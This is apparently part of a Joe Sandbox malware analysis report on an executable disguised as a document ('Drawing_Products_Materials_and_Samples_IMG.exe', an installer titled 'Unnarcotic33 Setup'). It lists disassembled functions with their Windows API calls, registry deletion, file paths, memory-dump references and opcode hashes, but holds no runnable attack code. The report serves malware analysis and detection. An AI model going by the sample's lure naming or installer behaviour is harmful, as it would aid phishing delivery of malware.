                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$Next$Prev
                                                                                      • String ID: "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 589700163-3558225924
                                                                                      • Opcode ID: ca421e288064bc83167a684e77603dc3b4a1af20f0b604c6044bfd7d30eb1efe
                                                                                      • Instruction ID: bb0259e4d3285964694be274da6e12c2e2bd34974b8553a87efbf76dbfb260e1
                                                                                      • Opcode Fuzzy Hash: ca421e288064bc83167a684e77603dc3b4a1af20f0b604c6044bfd7d30eb1efe
                                                                                      • Instruction Fuzzy Hash: 01110872808B9129EB3217248C44B777F89CB9A760F18047BE5D5722C2D67C5E828AED
                                                                                      Function 00403EF3 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowLongA.USER32(?,000000EB), ref: 00403F10
                                                                                      • GetSysColor.USER32(00000000), ref: 00403F2C
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00403F38
                                                                                      • SetBkMode.GDI32(?,?), ref: 00403F44
                                                                                      • GetSysColor.USER32(?), ref: 00403F57
                                                                                      • SetBkColor.GDI32(?,?), ref: 00403F67
                                                                                      • DeleteObject.GDI32(?), ref: 00403F81
                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00403F8B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2320649405-0
                                                                                      • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                                                      • Instruction ID: 89798723a00c12270f90293d7c2ee841fba0b57e24c86d845a8f250d462b8669
                                                                                      • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                                                      • Instruction Fuzzy Hash: 4A21C671904745AFCB209F28DD08B4BBFF8AF00705F048A2AF895E22E0C338E904CB55
                                                                                      Function 100021AF Relevance: 10.6, APIs: 7, Instructions: 136memorystringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(?), ref: 10002264
                                                                                      • GlobalAlloc.KERNEL32(?,?), ref: 1000228E
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022A3
                                                                                      • GlobalAlloc.KERNEL32(?,?), ref: 100022B2
                                                                                      • CLSIDFromString.OLE32(00000000,00000000), ref: 100022BF
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100022C6
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100022FD
                                                                                        • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012E1,?,100011AB,-000000A0), ref: 10001234
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17896186253.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17896153967.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17896219730.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17896248787.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpynlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 3955009414-0
                                                                                      • Opcode ID: 6f954f9c0618815bde6281dca4a505d58a7e7623750b0b9f916781d510563757
                                                                                      • Instruction ID: a605aeec0f08bdd00b0ee3428b37a4786007c3c680f5ed26bc2609ce7b065058
                                                                                      • Opcode Fuzzy Hash: 6f954f9c0618815bde6281dca4a505d58a7e7623750b0b9f916781d510563757
                                                                                      • Instruction Fuzzy Hash: 5741AD70504306EFF364DFA48984B6BB7F8FB453E1F21492AF956C619ADB30A840DB61
                                                                                      Function 00404754 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040476F
                                                                                      • GetMessagePos.USER32 ref: 00404777
                                                                                      • ScreenToClient.USER32(?,?), ref: 00404791
                                                                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 004047A3
                                                                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047C9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Send$ClientScreen
                                                                                      • String ID: f
                                                                                      • API String ID: 41195575-1993550816
                                                                                      • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                                      • Instruction ID: e12531cc2cbda9362446d3482c890d37ab0b9233c447bf2f23075c067c261130
                                                                                      • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                                      • Instruction Fuzzy Hash: 98014075D00219BAEB11DBA4DC45BFEBBBCAB55711F10412BBA10B71C0C7B465418BA5
                                                                                      Function 00401D29 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDC.USER32 ref: 00401D29
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                                                                      • CreateFontIndirectA.GDI32(0040AFA0), ref: 00401DA1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                      • String ID: Calibri
                                                                                      • API String ID: 3808545654-1409258342
                                                                                      • Opcode ID: 8af17ff95081d21d1027b9af728977dfff0c54460677ef1fa0b078a7428bad5a
                                                                                      • Instruction ID: f673732a1965e1841e3dc773f834cd1eb830dba4bc501641647caa1edf213688
                                                                                      • Opcode Fuzzy Hash: 8af17ff95081d21d1027b9af728977dfff0c54460677ef1fa0b078a7428bad5a
                                                                                      • Instruction Fuzzy Hash: BC0186B1958341AFE70157B06F1ABAB7F74A725705F100439F146B62E2C67C10158B2F
                                                                                      Function 00404646 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(Unnarcotic33 Setup: Installing,Unnarcotic33 Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,00404592,000000DF,0000040F,00000400,00000000), ref: 00404700
                                                                                      • wsprintfA.USER32 ref: 00404708
                                                                                      • SetDlgItemTextA.USER32(?,Unnarcotic33 Setup: Installing), ref: 0040471B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                      • String ID: %u.%u%s%s$Unnarcotic33 Setup: Installing
                                                                                      • API String ID: 3540041739-2646345114
                                                                                      • Opcode ID: 7a81a8563b002668758aa30ec7e0d3ef26a39900569464a91fec119d387db878
                                                                                      • Instruction ID: 4c0b19b1b1a6a4816020a8c86cd3a3baa7054b2c2c52423adae1d4b59055f951
                                                                                      • Opcode Fuzzy Hash: 7a81a8563b002668758aa30ec7e0d3ef26a39900569464a91fec119d387db878
                                                                                      • Instruction Fuzzy Hash: 40113A736002243AEB00A6799C01EEF3659DBD2335F14453BFA1AF50D2F97E981142A9
                                                                                      Function 00404672 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(Unnarcotic33 Setup: Installing,Unnarcotic33 Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,00404592,000000DF,0000040F,00000400,00000000), ref: 00404700
                                                                                      • wsprintfA.USER32 ref: 00404708
                                                                                      • SetDlgItemTextA.USER32(?,Unnarcotic33 Setup: Installing), ref: 0040471B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                      • String ID: %u.%u%s%s$Unnarcotic33 Setup: Installing
                                                                                      • API String ID: 3540041739-2646345114
                                                                                      • Opcode ID: e71bc9b29eeb09f43c78bc10772295be6f81fb3e8ed297937e24ce802457d4f2
                                                                                      • Instruction ID: b9eb64851fedaacd123e4baa5ce65a5686f114beaf7671e7a0f873141027489b
                                                                                      • Opcode Fuzzy Hash: e71bc9b29eeb09f43c78bc10772295be6f81fb3e8ed297937e24ce802457d4f2
                                                                                      • Instruction Fuzzy Hash: B911087360023437DB00A5699C05EAF325ECBC2334F14463BFA29F61D1E9799C5182E9
                                                                                      Function 00402A47 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A68
                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AA4
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402AAD
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402AD2
                                                                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AF0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                      • String ID:
                                                                                      • API String ID: 1912718029-0
                                                                                      • Opcode ID: 6ccabfd9daed6dfd24be4e757130db04132cda2359aedd25e4475ff07f213d8b
                                                                                      • Instruction ID: eecf360da6df2efa0186febf022189a705215a27ca05cea183c71e0b6ea401ae
                                                                                      • Opcode Fuzzy Hash: 6ccabfd9daed6dfd24be4e757130db04132cda2359aedd25e4475ff07f213d8b
                                                                                      • Instruction Fuzzy Hash: C4116D31600108BFDF219F90DE48DAA3B6DEB55348B108036FA06A00A0D7B89E519F69
                                                                                      Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?), ref: 00401CD0
                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                                                                      • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                                                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                                                                      • DeleteObject.GDI32(00000000), ref: 00401D1B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 1849352358-0
                                                                                      • Opcode ID: 021e644993cfb9adf629f3f775699f6f2d9ab0f22eaab13517154c12b5018b7c
                                                                                      • Instruction ID: 7c3280a60d84a3596340f685d6ada4bc9ba3972ea03b1155ec5ca5a37b5200ea
                                                                                      • Opcode Fuzzy Hash: 021e644993cfb9adf629f3f775699f6f2d9ab0f22eaab13517154c12b5018b7c
                                                                                      • Instruction Fuzzy Hash: 01F04FB2905104AFD701EBA4EE88CAFB7BCEB44301B004476F601F2091C638AD018B79
                                                                                      Function 004038EC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetWindowTextA.USER32(00000000,007A1F00), ref: 00403984
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: TextWindow
                                                                                      • String ID: "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"$1033$Unnarcotic33 Setup: Installing
                                                                                      • API String ID: 530164218-3264260489
                                                                                      • Opcode ID: d383edaf56b359519887456eaf9e12f5ab453c70e69a7f558b02cbb3a29e5497
                                                                                      • Instruction ID: e9ab1962833233591b25b756af0d4d76970a397b62c84286e92f90c0dad54111
                                                                                      • Opcode Fuzzy Hash: d383edaf56b359519887456eaf9e12f5ab453c70e69a7f558b02cbb3a29e5497
                                                                                      • Instruction Fuzzy Hash: 1111D8B1B046119BC724DF19DC809377BADEB86756318813FE902673A1D67D9D028B68
                                                                                      Function 00405629 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030D9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 0040562F
                                                                                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030D9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 00405638
                                                                                      • lstrcatA.KERNEL32(?,00409014), ref: 00405649
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405629
